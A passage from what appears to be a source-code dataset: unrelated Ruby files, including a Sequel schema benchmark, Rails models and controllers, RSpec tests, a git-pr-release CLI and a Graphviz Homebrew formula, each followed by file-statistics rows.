# a message to tell them that they're currently past the due date.
def overtime_message
raise NotImplementedError.new('SubmissionRule: overtime_message not implemented')
end
# Returns true or false based on whether the attached Assignment's properties
# will work with this particular SubmissionRule
def assignment_valid?
raise NotImplementedError.new('SubmissionRule: assignment_valid? not implemented')
end
# Takes a Submission (with an attached Result), and based on the properties of
# this SubmissionRule, applies penalties to the Result - for example, will
# add an ExtraMark of a negative value, or perhaps add the use of a Grace Day.
def apply_submission_rule(submission)
raise NotImplementedError.new('SubmissionRule: apply_submission_rule not implemented')
end
def description_of_rule
raise NotImplementedError.new('SubmissionRule: description_of_rule not implemented')
end
def grader_tab_partial(grouping)
raise NotImplementedError.new('SubmissionRule: render_grader_tab not implemented')
end
def reset_collection_time
@get_collection_time = nil
@can_collect_now = nil
end
private
# Over time hours could be a fraction. This is mostly used for testing
def calculate_overtime_hours_from(from_time)
overtime_hours = (from_time - assignment.due_date) / 1.hour
# If the overtime is less than 0, that means it was submitted early, so
# just return 0 - otherwise, return overtime_hours.
[0, overtime_hours].max
end
def hours_sum
0
end
end
| 33.859649 | 101 | 0.764249 |
d5f97bca6d03d375bfd40e9ee9f5c9ab1763940b | 5,122 | require 'sequel'
require 'benchmark'
DB = Sequel.connect ARGV[0]
# Schema 1: translations keyed by the Ruby String#hash of the msgid.
DB.create_table! :languages1 do
  primary_key :id
  varchar :name, :size => 16, :unique => true
  varchar :plural, :size => 128
end
DB.create_table! :translations1 do
  primary_key [:language_id, :msgid_hash, :msgstr_index]
  foreign_key :language_id, :languages1, :null => false
  integer :msgid_hash, :null => false
  text :msgstr, :null => false
  integer :msgstr_index
end
# Schema 2: translations carry the msgid string inline.
DB.create_table! :languages2 do
  primary_key :id
  varchar :name, :size => 16, :unique => true
  varchar :plural, :size => 128
end
DB.create_table! :translations2 do
  primary_key [:language_id, :msgid, :msgstr_index]
  foreign_key :language_id, :languages2, :null => false
  text :msgid, :null => false
  text :msgstr, :null => false
  integer :msgstr_index
end
# Schema 3: msgids normalised into a separate original3 table.
DB.create_table! :languages3 do
  primary_key :id
  varchar :name, :size => 16, :unique => true
  varchar :plural, :size => 128
end
# Bug fix: the original line was `drop_table :original3 rescue nil`, but
# `drop_table` is only defined inside Sequel migrations, not at script
# scope — the trailing `rescue nil` silently swallowed the NoMethodError,
# so the table was never dropped. Database#drop_table? drops the table
# only if it exists, with no rescue needed.
DB.drop_table?(:original3)
DB << "CREATE TABLE original3 (id INTEGER PRIMARY KEY, msgid TEXT)"
DB.create_table! :translations3 do
  primary_key [:language_id, :original_id, :msgstr_index]
  foreign_key :language_id, :languages3, :null => false
  foreign_key :original_id, :original3, :null => false
  text :msgstr, :null => false
  integer :msgstr_index
end
# Alphanumeric alphabet used for all generated fixture strings.
$chars = ('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a

# Returns a random alphanumeric string of the given length.
def rand_string(size)
  Array.new(size) { $chars[Kernel.rand($chars.length)] }.join
end

# Corpus of 128 random source strings, sorted and de-duplicated.
$original = Array.new(128) { rand_string(32) }
$original.sort!.uniq!

# Three fake languages, each with a plural rule and one translation per msgid.
$translations = {}
$plurals = {}
3.times do
  lang_name = rand_string(2)
  entries = {}
  $translations[lang_name] = entries
  $plurals[lang_name] = rand_string(8)
  $original.each { |msgid| entries[msgid] = rand_string(32) }
end
$languages = $plurals.keys

# Picks a random language code from the generated set.
def rand_language
  $languages.fetch(Kernel.rand($languages.length))
end

# Picks a random msgid from the corpus.
def rand_original
  $original.fetch(Kernel.rand($original.length))
end
# Benchmark 1: time inserting every language and translation row under each
# of the three schema layouts.
puts 'Export'
Benchmark.bm(22) do |bm|
bm.report('Original 0.0.3:') do
$translations.each do |lang, trans|
lang_id = (DB[:languages1] << {:name => lang, :plural => $plurals[lang]})
trans.each do |original, translation|
DB[:translations1] << {
:language_id => lang_id,
:msgid_hash => original.hash,
:msgstr => translation
}
end
end
end
bm.report('With string inside:') do
$translations.each do |lang, trans|
lang_id = (DB[:languages2] << {:name => lang, :plural => $plurals[lang]})
trans.each do |original, translation|
DB[:translations2] << {
:language_id => lang_id,
:msgid => original,
:msgstr => translation
}
end
end
end
# Schema 3 also pays for populating the shared original3 lookup table.
bm.report('With separate strings:') do
$original.each do |original|
DB[:original3] << {:id => original.hash, :msgid => original}
end
$translations.each do |lang, trans|
lang_id = (DB[:languages3] << {:name => lang, :plural => $plurals[lang]})
trans.each do |original, translation|
DB[:translations3] << {
:language_id => lang_id,
:original_id => original.hash,
:msgstr => translation
}
end
end
end
end
# Benchmark 2: 1024 random (language, msgid) lookups against each schema.
# Each lookup first resolves the language id, then fetches the singular
# (msgstr_index IS NULL) translation row.
$search = (0...1024).collect {[rand_language, rand_original]}
puts ''
puts 'Searching'
Benchmark.bm(22) do |bm|
bm.report('Original 0.0.3:') do
$search.each do |arr|
_lang, _orig = *arr
lang = DB[:languages1].filter(:name => _lang).first[:id]
trans = DB[:translations1].filter(:language_id => lang,
:msgid_hash => _orig.hash,
:msgstr_index => nil).first[:msgstr]
end
end
bm.report('With string inside:') do
$search.each do |arr|
_lang, _orig = *arr
lang = DB[:languages2].filter(:name => _lang).first[:id]
trans = DB[:translations2].filter(:language_id => lang,
:msgid => _orig,
:msgstr_index => nil).first[:msgstr]
end
end
bm.report('With separate strings:') do
$search.each do |arr|
_lang, _orig = *arr
lang = DB[:languages3].filter(:name => _lang).first[:id]
trans = DB[:translations3].filter(:language_id => lang,
:original_id => _orig.hash,
:msgstr_index => nil).first[:msgstr]
end
end
end
# Benchmark 3: iterate every stored translation back out (schema 1 is
# excluded — hashes alone cannot recover the original msgid strings).
puts ''
puts 'Import'
Benchmark.bm(22) do |bm|
bm.report('With string inside:') do
DB[:languages2].each do |lang|
DB[:translations2].each do |trans|
[lang[:name], trans[:msgid], trans[:msgstr], trans[:msgstr_index]]
end
end
end
# NOTE(review): schema 3 pays one extra lookup query per translation row
# to resolve the msgid from original3.
bm.report('With separate strings:') do
DB[:languages3].each do |lang|
DB[:translations3].each do |trans|
orig = DB[:original3].filter(:id => trans[:original_id]).first[:msgid]
[lang[:name], orig, trans[:msgstr], trans[:msgstr_index]]
end
end
end
end
| 29.268571 | 79 | 0.588832 |
e9f849b5240d4348db712d520da3f85476889ad1 | 274 | require 'rails_helper'
# Model spec: an Identifier's code must be unique across records.
RSpec.describe Identifier, type: :model do
  let(:identifier) { create :identifier }

  describe 'the code' do
    it 'should be unique' do
      duplicate = described_class.new(code: identifier.code)
      expect(duplicate.valid?).to be_falsey
    end
  end
end
| 21.076923 | 51 | 0.689781 |
38227ac2e7193512405779ebca5d4c650702ec3a | 88 | # frozen_string_literal: true
# A single task line item; every Task belongs to exactly one Project.
# NOTE(review): under Rails 5+ `belongs_to` is required by default — confirm
# whether a project-less task should be allowed.
class Task < ApplicationRecord
  belongs_to :project
end
| 14.666667 | 30 | 0.806818 |
1dfb6f875cbdb7d642727473bf7903b27db6adb9 | 114 | json.extract! chat, :id, :student_id, :mentor_id, :created_at, :updated_at
json.url chat_url(chat, format: :json)
| 38 | 74 | 0.745614 |
331b5018bae5f80f5aca0c3494ba6141645230cb | 1,580 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "googleauth"
module Google
  module Cloud
    module AutoML
      module V1beta1
        module AutoML
          # Credentials for the AutoMl API.
          # NOTE(review): this file is auto-generated (see header) — any edits
          # here will be lost on regeneration.
          class Credentials < ::Google::Auth::Credentials
            self.scope = [
              "https://www.googleapis.com/auth/cloud-platform"
            ]
            # Environment variables consulted when locating credentials.
            self.env_vars = [
              "AUTOML_CREDENTIALS",
              "AUTOML_KEYFILE",
              "GOOGLE_CLOUD_CREDENTIALS",
              "GOOGLE_CLOUD_KEYFILE",
              "GCLOUD_KEYFILE",
              "AUTOML_CREDENTIALS_JSON",
              "AUTOML_KEYFILE_JSON",
              "GOOGLE_CLOUD_CREDENTIALS_JSON",
              "GOOGLE_CLOUD_KEYFILE_JSON",
              "GCLOUD_KEYFILE_JSON"
            ]
            # Filesystem fallback for application default credentials.
            self.paths = [
              "~/.config/google_cloud/application_default_credentials.json"
            ]
          end
        end
      end
    end
  end
end
| 30.384615 | 75 | 0.626582 |
acf81699756e8ab772f15ae1a0b8365d4ae34717 | 484 | AvatarsForRails.setup do |config|
# Filters to run before updating the avatar
# config.controller_filters = [ :authenticate_user! ]
# The method to get the avatarable in the controller
# config.controller_avatarable = :current_user
# The default styles that will be generated
# config.avatarable_styles = { small: '50x50',
# medium: '120x120' }
# The tmp path inside public/
# config.public_tmp_path = File.join('system', 'tmp')
end
| 32.266667 | 55 | 0.679752 |
39a0555eea02db61e532fda62fc2293701903bd8 | 2,200 | module EpiCas
class LdapInfo < Struct.new(:username, :user_class)
def attributes
@attributes ||= get_ldap_info
end
def uid
attributes[:uid]
end
def mail
attributes[:mail]
end
def dn
attributes[:dn]
end
def ou
attributes[:ou]
end
def found?
!attributes.empty?
end
private
def get_ldap_info(setting_class = Settings)
begin
return get_ldap_info_from_database if setting_class.read_only
lookup = ldap_finder.lookup
return {} if lookup.blank?
base_info = {
uid: lookup['uid'][0].to_s,
givenname: lookup['givenname'][0].to_s,
sn: lookup['sn'][0].to_s,
mail: lookup['mail'][0].to_s.downcase,
dn: lookup['dn'][0].to_s,
ou: lookup['ou'][0].to_s,
}
if lookup['ou'].size > 1
base_info[:all_ous] = lookup['ou'].map(&:to_s)
end
base_info[:initials] = lookup['initials'][0].to_s.upcase if lookup['initials'].any?
base_info[:person_code] = lookup['shefpersoncode'][0].to_s if lookup['shefpersoncode'].any?
base_info[:reg_number] = lookup['shefregnumber'][0].to_s if lookup['shefregnumber'].any?
base_info[:ucard_number] = lookup['sheflibrarynumber'][0].to_s if lookup['sheflibrarynumber'].any?
base_info
rescue
# If LDAP server is down, fallback to existing records.
get_ldap_info_from_database
end
end
def get_ldap_info_from_database(model = user_class)
existing_user = model.find_by_username(username)
return {} unless existing_user
{
uid: existing_user.uid,
givenname: existing_user.givenname,
sn: existing_user.sn,
mail: existing_user.mail,
dn: existing_user.dn,
ou: existing_user.ou
}
end
def ldap_finder(ldap_finder_class = SheffieldLdapLookup::LdapFinder)
@ldap_finder ||= ldap_finder_class.new(username)
end
end
end | 28.947368 | 108 | 0.562727 |
3963b9d35f3e68ab108180074f292f5d00320177 | 1,284 | class MoviesController < ApplicationController
respond_to :html
# this is really heavy. Should probably move to a javascript form
before_action :load_actors, only: [:new, :create, :edit, :update]
def index
@filter = Filter.new({ title: :title, actor: 'actors.name' }, params)
respond_with @movies = @filter.apply(Movie)
end
def show
respond_with @movie = Movie.find(params[:id])
end
def new
respond_with @movie = Movie.new
end
def create
@movie = Movie.new(movie_params)
if @movie.save
flash[:notice] = 'Movie created successfully.'
end
respond_with @movie
end
def edit
respond_with @movie = Movie.find(params[:id])
end
def update
@movie = Movie.find(params[:id])
if @movie.update_attributes(movie_params)
flash[:notice] = 'Movie updated successfully.'
end
respond_with @movie, location: movies_url
end
def destroy
@movie = Movie.find(params[:id])
respond_with @movie, location: root_url if @movie.nil?
@movie.destroy
flash[:notice] = 'Movie successfully deleted.'
respond_with @movie
end
private
def movie_params
params.require(:movie).permit(:title, :thumbnail_url, actor_ids: [])
end
def load_actors
@actors = Actor.all
end
end
| 20.380952 | 73 | 0.674455 |
e21a79fe69e037fd443f1b4d844d5bd41c44aa9b | 5,873 | require 'octokit'
require 'optparse'
module Git
module Pr
module Release
class CLI
include Git::Pr::Release::Util
extend Git::Pr::Release::Util
def self.start
host, repository, scheme = host_and_repository_and_scheme
if host
# GitHub:Enterprise
OpenSSL::SSL.const_set :VERIFY_PEER, OpenSSL::SSL::VERIFY_NONE # XXX
Octokit.configure do |c|
c.api_endpoint = "#{scheme}://#{host}/api/v3"
c.web_endpoint = "#{scheme}://#{host}/"
end
end
OptionParser.new do |opts|
opts.on('-n', '--dry-run', 'Do not create/update a PR. Just prints out') do |v|
@dry_run = v
end
opts.on('--json', 'Show data of target PRs in JSON format') do |v|
@json = v
end
opts.on('--no-fetch', 'Do not fetch from remote repo before determining target PRs (CI friendly)') do |v|
@no_fetch = v
end
end.parse!
### Set up configuration
production_branch = ENV.fetch('GIT_PR_RELEASE_BRANCH_PRODUCTION') { git_config('branch.production') } || 'master'
staging_branch = ENV.fetch('GIT_PR_RELEASE_BRANCH_STAGING') { git_config('branch.staging') } || 'staging'
say "Repository: #{repository}", :debug
say "Production branch: #{production_branch}", :debug
say "Staging branch: #{staging_branch}", :debug
client = Octokit::Client.new :access_token => obtain_token!
git :remote, 'update', 'origin' unless @no_fetch
### Fetch merged PRs
merged_feature_head_sha1s = git(
:log, '--merges', '--pretty=format:%P', "origin/#{production_branch}..origin/#{staging_branch}"
).map do |line|
main_sha1, feature_sha1 = line.chomp.split /\s+/
feature_sha1
end
merged_pull_request_numbers = git('ls-remote', 'origin', 'refs/pull/*/head').map do |line|
sha1, ref = line.chomp.split /\s+/
if merged_feature_head_sha1s.include? sha1
if %r<^refs/pull/(\d+)/head$>.match ref
pr_number = $1.to_i
if git('merge-base', sha1, "origin/#{production_branch}").first.chomp == sha1
say "##{pr_number} (#{sha1}) is already merged into #{production_branch}", :debug
else
pr_number
end
else
say "Bad pull request head ref format: #{ref}", :warn
nil
end
end
end.compact
if merged_pull_request_numbers.empty?
say 'No pull requests to be released', :error
exit 1
end
merged_prs = merged_pull_request_numbers.map do |nr|
pr = client.pull_request repository, nr
say "To be released: ##{pr.number} #{pr.title}", :notice
pr
end
### Create a release PR
say 'Searching for existing release pull requests...', :info
found_release_pr = client.pull_requests(repository).find do |pr|
pr.head.ref == staging_branch && pr.base.ref == production_branch
end
create_mode = found_release_pr.nil?
# Fetch changed files of a release PR
changed_files = pull_request_files(client, found_release_pr)
if @dry_run
pr_title, new_body = build_pr_title_and_body found_release_pr, merged_prs, changed_files
pr_body = create_mode ? new_body : merge_pr_body(found_release_pr.body, new_body)
say 'Dry-run. Not updating PR', :info
say pr_title, :notice
say pr_body, :notice
dump_result_as_json( found_release_pr, merged_prs, changed_files ) if @json
exit 0
end
pr_title, pr_body = nil, nil
release_pr = nil
if create_mode
created_pr = client.create_pull_request(
repository, production_branch, staging_branch, 'Preparing release pull request...', ''
)
unless created_pr
say 'Failed to create a new pull request', :error
exit 2
end
changed_files = pull_request_files(client, created_pr) # Refetch changed files from created_pr
pr_title, pr_body = build_pr_title_and_body created_pr, merged_prs, changed_files
release_pr = created_pr
else
pr_title, new_body = build_pr_title_and_body found_release_pr, merged_prs, changed_files
pr_body = merge_pr_body(found_release_pr.body, new_body)
release_pr = found_release_pr
end
say 'Pull request body:', :debug
say pr_body, :debug
updated_pull_request = client.update_pull_request(
repository, release_pr.number, :title => pr_title, :body => pr_body
)
unless updated_pull_request
say 'Failed to update a pull request', :error
exit 3
end
labels = ENV.fetch('GIT_PR_RELEASE_LABELS') { git_config('labels') }
if not labels.nil? and not labels.empty?
labels = labels.split(/\s*,\s*/)
labeled_pull_request = client.add_labels_to_an_issue(
repository, release_pr.number, labels
)
unless labeled_pull_request
say 'Failed to add labels to a pull request', :error
exit 4
end
end
say "#{create_mode ? 'Created' : 'Updated'} pull request: #{updated_pull_request.rels[:html].href}", :notice
dump_result_as_json( release_pr, merged_prs, changed_files ) if @json
end
end
end
end
end
| 36.478261 | 124 | 0.570747 |
79e4885ebf0dc04a439abb9898963cdc02225260 | 2,870 | require 'formula'
# Homebrew formula for Graphviz 2.30.1 (stable) / 2.31.x (devel).
class Graphviz < Formula
  homepage 'http://graphviz.org/'
  url 'http://www.graphviz.org/pub/graphviz/stable/SOURCES/graphviz-2.30.1.tar.gz'
  sha1 '96739220c4bbcf1bd3bd52e7111f4e60497185c6'
  devel do
    url 'http://graphviz.org/pub/graphviz/development/SOURCES/graphviz-2.31.20130608.0446.tar.gz'
    sha1 '390635729e799fbcc1d8025450b2bf4ad9627b13'
  end
  # To find Ruby and Co.
  env :std
  option :universal
  option 'with-bindings', 'Build Perl/Python/Ruby/etc. bindings'
  option 'with-pangocairo', 'Build with Pango/Cairo for alternate PDF output'
  option 'with-freetype', 'Build with FreeType support'
  option 'with-x', 'Build with X11 support'
  option 'with-app', 'Build GraphViz.app (requires full XCode install)'
  option 'with-gts', 'Build with GNU GTS support (required by prism)'
  depends_on :libpng
  depends_on 'pkg-config' => :build
  depends_on 'pango' if build.include? 'with-pangocairo'
  depends_on 'swig' if build.include? 'with-bindings'
  depends_on :python if build.include? 'with-bindings' # this will set up python
  depends_on 'gts' => :optional
  # FreeType/X11 are pulled in automatically when an X11 install is detected.
  depends_on :freetype if build.include? 'with-freetype' or MacOS::X11.installed?
  depends_on :x11 if build.include? 'with-x' or MacOS::X11.installed?
  depends_on :xcode if build.include? 'with-app'
  fails_with :clang do
    build 318
  end
  # MacPorts patch for the Xcode project used by the optional app build.
  def patches
    {:p0 =>
      "https://trac.macports.org/export/103168/trunk/dports/graphics/graphviz/files/patch-project.pbxproj.diff",
    }
  end
  def install
    ENV.universal_binary if build.universal?
    # Feature flags below must mirror the option/dependency logic above.
    args = ["--disable-debug",
            "--disable-dependency-tracking",
            "--prefix=#{prefix}",
            "--without-qt",
            "--with-quartz"]
    args << "--with-gts" if build.with? 'gts'
    args << "--disable-swig" unless build.include? 'with-bindings'
    args << "--without-pangocairo" unless build.include? 'with-pangocairo'
    args << "--without-freetype2" unless build.include? 'with-freetype' or MacOS::X11.installed?
    args << "--without-x" unless build.include? 'with-x' or MacOS::X11.installed?
    system "./configure", *args
    system "make install"
    if build.include? 'with-app'
      # build Graphviz.app
      cd "macosx" do
        system "xcodebuild", "-configuration", "Release", "SYMROOT=build", "PREFIX=#{prefix}", "ONLY_ACTIVE_ARCH=YES"
      end
      prefix.install "macosx/build/Release/Graphviz.app"
    end
    (bin+'gvmap.sh').unlink
  end
  test do
    (testpath/'sample.dot').write <<-EOS.undent
      digraph G {
        a -> b
      }
    EOS
    system "#{bin}/dot", "-Tpdf", "-o", "sample.pdf", "sample.dot"
  end
  def caveats
    if build.include? 'with-app'
      <<-EOS
        Graphviz.app was installed in:
          #{prefix}
        To symlink into ~/Applications, you can do:
          brew linkapps
        EOS
    end
  end
end
| 30.531915 | 117 | 0.661324 |
3913851f15b6a60e493679cf8a6c5851495db6de | 334 | require "simplecov"
# Coverage is started before the app is required so application code is
# instrumented by SimpleCov.
SimpleCov.start "rails"
ENV["RAILS_ENV"] ||= "test"
require_relative "../config/environment"
require "rails/test_help"
class ActiveSupport::TestCase
  # Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.
  fixtures :all
  # Add more helper methods to be used by all tests here...
end
| 25.692308 | 82 | 0.748503 |
1dc1245a70aed970292bd7584834116e553ba876 | 713 | class Notification < ApplicationRecord
self.inheritance_column = nil
serialize :params, Noticed::Coder
belongs_to :recipient, polymorphic: true
scope :sorted, -> { order(created_at: :desc) }
def self.mark_as_read!
update_all(read_at: Time.current, updated_at: Time.current)
end
# Rehydrate the database notification into the Notification object for rendering
def to_instance
@instance ||= begin
instance = type.constantize.new(params)
instance.record = self
instance
end
end
def mark_as_read!
update(read_at: Time.current)
end
def unread?
!read?
end
def read?
read_at?
end
end
| 20.371429 | 82 | 0.643759 |
33e4f364dcdf5d18efeb76844f68fd2ef81b01d4 | 3,984 | module MyAcademics
class CollegeAndLevel
include AcademicsModule, ClassLogger
def merge(data)
response = Bearfacts::Profile.new(user_id: @uid).get
feed = response.delete :feed
# The Bear Facts API can return empty profiles if the user is no longer (or not yet) considered an active student.
# Partial profiles can be returned for incoming students around the start of the term.
if (feed.nil? || feed['studentProfile']['studentGeneralProfile'].blank? || feed['studentProfile']['ugGradFlag'].blank?)
response[:empty] = true
else
response.merge! parse_feed(feed)
end
response[:termName] = parse_term_name feed
data[:collegeAndLevel] = response
end
def parse_feed(feed)
ug_grad_flag = feed['studentProfile']['ugGradFlag'].to_text
standing = case ug_grad_flag.upcase
when 'U' then 'Undergraduate'
when 'G' then 'Graduate'
else
logger.error("Unknown ugGradFlag '#{ug_grad_flag}' for user #{@uid}")
return {}
end
general_profile = feed['studentProfile']['studentGeneralProfile']
level = general_profile['corpEducLevel'].to_text.titleize
nonAPLevel = general_profile['nonAPLevel'].to_text.titleize
futureTBLevel = general_profile['futureTBLevel'].to_text.titleize
colleges = []
primary_college_abbv = general_profile['collegePrimary'].to_text
primary_college = Berkeley::Colleges.get(primary_college_abbv)
primary_major = Berkeley::Majors.get(general_profile['majorPrimary'].to_text)
# this code block is not very DRY, but that makes it easier to understand the wacky requirements. See CLC-2017 for background.
if primary_college_abbv.in?(['GRAD DIV', 'LAW', 'CONCURNT'])
if primary_major == 'Double' || primary_major == 'Triple'
colleges << {
:college => (general_profile['collegeSecond'].blank? ? primary_college : Berkeley::Colleges.get(general_profile['collegeSecond'].to_text)),
:major => Berkeley::Majors.get(general_profile['majorSecond'].to_text)
}
colleges << {
:college => Berkeley::Colleges.get(general_profile['collegeThird'].to_text),
:major => Berkeley::Majors.get(general_profile['majorThird'].to_text)
}
if primary_major == 'Triple'
colleges << {
:college => Berkeley::Colleges.get(general_profile['collegeFourth'].to_text),
:major => Berkeley::Majors.get(general_profile['majorFourth'].to_text)
}
end
else
colleges << {
:college => primary_college,
:major => primary_major
}
end
else
if primary_major == 'Double' || primary_major == 'Triple'
colleges << {
:college => primary_college,
:major => Berkeley::Majors.get(general_profile['majorSecond'].to_text)
}
colleges << {
:college => '',
:major => Berkeley::Majors.get(general_profile['majorThird'].to_text)
}
if primary_major == 'Triple'
colleges << {
:college => '',
:major => Berkeley::Majors.get(general_profile['majorFourth'].to_text)
}
end
else
colleges << {
:college => primary_college,
:major => primary_major
}
end
end
{
standing: standing,
level: level,
nonApLevel: nonAPLevel,
futureTelebearsLevel: futureTBLevel,
colleges: colleges
}
end
def parse_term_name(feed)
if (feed.nil? || feed['studentProfile']['termName'].blank? || feed['studentProfile']['termYear'].blank?)
Berkeley::Terms.fetch.current.to_english
else
"#{feed['studentProfile']['termName'].to_text} #{feed['studentProfile']['termYear'].to_text}"
end
end
end
end
| 37.233645 | 151 | 0.609438 |
b93fbafdd2539e83afe861ab0fa11e0c5c1dd77c | 180 | #!/usr/bin/env ruby
# Make the application's app/lib directory loadable relative to this script.
$LOAD_PATH.unshift(File.join(File.expand_path('..', __dir__), 'app/lib'))
# NOTE(review): presumably signals "not running under rake" to the app —
# confirm where ENV['RAKE'] is read.
ENV['RAKE'] = nil
require 'tomato_shrieker'
# Start the singleton scheduler loop.
TomatoShrieker::Scheduler.instance.exec
| 22.5 | 73 | 0.733333 |
627851dba25cae2682bce84e60c018a1a71fd8a5 | 1,104 | require 'test_helper'
# Functional tests for NotificationsController CRUD actions.
# NOTE(review): uses the legacy ActionController::TestCase request style
# (positional params, `assigns`) — Rails 4-era syntax; needs rewriting for
# newer Rails versions.
class NotificationsControllerTest < ActionController::TestCase
  def test_should_get_index
    get :index
    assert_response :success
    assert_not_nil assigns(:notifications)
  end
  def test_should_get_new
    get :new
    assert_response :success
  end
  def test_should_create_notification
    assert_difference('Notification.count') do
      post :create, :notification => { }
    end
    assert_redirected_to notification_path(assigns(:notification))
  end
  def test_should_show_notification
    get :show, :id => notifications(:one).id
    assert_response :success
  end
  def test_should_get_edit
    get :edit, :id => notifications(:one).id
    assert_response :success
  end
  def test_should_update_notification
    put :update, :id => notifications(:one).id, :notification => { }
    assert_redirected_to notification_path(assigns(:notification))
  end
  def test_should_destroy_notification
    assert_difference('Notification.count', -1) do
      delete :destroy, :id => notifications(:one).id
    end
    assert_redirected_to notifications_path
  end
end
| 24 | 68 | 0.740036 |
7abd1492681ac5137055c31b56c1000443a39d1b | 312 | cask "shift" do
version "5.0.86"
sha256 "f3ceca819a0bc29f4acb334e80bc9a9f564204dccfd7cdcf5c20d97c4e427d41"
url "https://update.tryshift.com/download/version/#{version}/osx_64"
appcast "https://tryshift.com/download/?platform=mac"
name "Shift"
homepage "https://tryshift.com/"
app "Shift.app"
end
| 26 | 75 | 0.75 |
792f8e9dd955755f81172c2bb1a61f486a9f7ce0 | 3,742 | require 'faye/websocket'
require 'eventmachine'
module RSlack
  module Slack
    # Mixin giving a bot real-time (WebSocket) connectivity plus a generic
    # HTTP helper for Slack's REST API.
    module Live
      attr_reader :url, :socket_client
      # Public: Method that connects to the WebSocket server using the URL
      # of the server which is inside the response of the rtm.start call
      #
      # url   - A WebSocket URL
      # block - A required block containing the action to be done when a message
      #         event was triggered by the WebSocket server
      #
      # Examples
      #
      #   class Dummy
      #     include RSlack::Slack::Live
      #
      #     def some_slack_method
      #       connect!(url: 'a url') do |message, channel|
      #       end
      #     end
      #   end
      #
      #
      # Raises 'A valid url must be passed' (RuntimeError) if url was not passed
      # Raises 'A valid block must be passed' (RuntimeError) if block was not passed
      def connect!(url:, &block)
        raise 'A valid url must be passed' if url.nil? || url.empty?
        # Fixed typo in this message: it previously read "must me passed".
        raise 'A valid block must be passed' unless block_given?
        @url = url
        EventMachine.run do
          @socket_client = Faye::WebSocket::Client.new(url)
          socket_client.on :message do |event|
            parsed = JSON.parse event.data
            if can_propagate? parsed
              # Mentions look like "<@bot_id>: text" — keep only the text part.
              text = parsed['text'].split(':').reverse.first
              channel = parsed['channel']
              block.call(text, channel)
            end
          end
        end
      end
      private
      # Internal: Generic method to perform any call to Slack's API
      #
      # method - Desired HTTP method (defaults to GET)
      # url    - Slack's desired API method
      # block  - An optional block containing the parameters of the request.
      #
      # Examples
      #
      #   class Dummy
      #     include RSlack::Slack::API
      #
      #     def some_slack_method(params = {})
      #       perform_call(method: :put, url: 'a-slack-method') do
      #         params
      #       end
      #     end
      #   end
      #
      #
      # Returns the response of the HTTP call or raises one of the following
      # errors:
      #
      # ConnectionFailedError => HTTP Errors
      # MigrationInProgressError => Error on Slack's RTM API: migration_in_progress
      # NotAuthenticatedError => Error on Slack's RTM API: not_authed
      # InvalidAuthError => Error on Slack's RTM API: invalid_auth
      # AccountInactiveError => Error on Slack's RTM API: account_inactive
      # InvalidCharsetError => Error on Slack's RTM API: invalid_charset
      def perform_call(method: :get, url:, &block)
        config = RSlack::Configuration.current
        url = "#{config.api_url}/#{url}?token=#{config.token}"
        params = {}
        begin
          params = block.call if block_given?
          response = RestClient.send(method, url, params)
        rescue => e
          raise ConnectionFailedError.new(e)
        end
        response = JSON.parse response.body
        check_response response unless response['ok']
        response
      end
      # Internal: Checks if the body of the event triggered by the
      # WebSocket server can be passed to the bot.
      #
      # parsed - Hash representing the parsed body of the event
      #
      # Returns true if: event is of the type 'message' and
      # id of the bot is nil or id of the user who sent the message is different
      # of the id of the bot and the message mentions the bot.
      #
      # NOTE(review): relies on an `id` method (the bot's user id) supplied by
      # the including class — it is not defined in this module.
      def can_propagate?(parsed)
        return false if parsed['type'] != 'message'
        id.nil? ||
        (
          id != parsed['user'] &&
          parsed['text'].include?(id)
        )
      end
    end
  end
end
| 31.982906 | 85 | 0.581507 |
abfd59eaa21750e38f2a2a8f9bb965b0027e31e8 | 1,158 | require_relative 'treasure_trove'
require_relative 'Playable'
module StudioGame
  # A game participant: tracks a capitalized name, health, and the treasures
  # found so far. Health-changing behaviour (w00t/blam) comes from Playable.
  class Player
    include Playable
    attr_accessor :name
    attr_reader :health
    def initialize(name, health=100)
      @name = name.capitalize
      @health = health
      # treasure name => accumulated points; missing keys default to 0.
      @found_treasures = Hash.new(0)
    end
    # Builds a Player from a "name,health" CSV line.
    # Integer() raises ArgumentError on a malformed health value.
    def self.from_csv(string)
      name, health = string.split(',')
      Player.new(name, Integer(health))
    end
    # Yields a Treasure (name, total points) for each kind of treasure found.
    def each_found_treasure
      @found_treasures.each do |name, points|
        yield Treasure.new(name, points)
      end
    end
    # Records a treasure pickup and announces it on stdout.
    def found_treasure(treasure)
      @found_treasures[treasure.name] += treasure.points
      puts "#{@name} found a #{treasure.name} worth #{treasure.points} points."
      puts "#{@name}'s treasures: #{@found_treasures}"
    end
    # Total treasure points. Array#sum replaces the former reduce(0, :+).
    def points
      @found_treasures.values.sum
    end
    def to_s
      "I'm #{@name} with health = #{@health}, points = #{points}, and score = #{score}."
    end
    def score
      @health + points
    end
    # Orders players by descending score.
    def <=>(other)
      other.score <=> score
    end
  end
  # Smoke-test demo when this file is executed directly.
  if __FILE__ == $0
    player = Player.new("moe")
    puts player.name
    puts player.health
    player.w00t
    puts player.health
    player.blam
    puts player.health
  end
end
| 19.3 | 85 | 0.67962 |
1de5243db2d5c8a3a014df1ed2449f0b98b45632 | 919 | # frozen_string_literal: true
# See LICENSE.txt at root of repository
# GENERATED FILE - DO NOT EDIT!!
require 'ansible/ruby/modules/base'
module Ansible
module Ruby
module Modules
# This module allows you to copy the running configuration of a switch over its startup configuration. It is recommended to use this module shortly after any major configuration changes so they persist after a switch restart. This module uses SSH to manage network device configuration. The results of the operation will be placed in a directory named 'results' that must be created by the user in their local directory to where the playbook is run. For more information about this module from Lenovo and customizing it usage for your use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_save.html)
class Cnos_save < Base
end
end
end
end
| 57.4375 | 672 | 0.781284 |
f8f14e9a34d96ac8056ebcee151a949ce65d265a | 1,235 | require_domain_file
describe ManageIQ::Automate::Cloud::VM::Provisioning::Profile::GetDeployDialog do
  let(:cat) { 'environment' }
  let(:tag) { 'dev' }
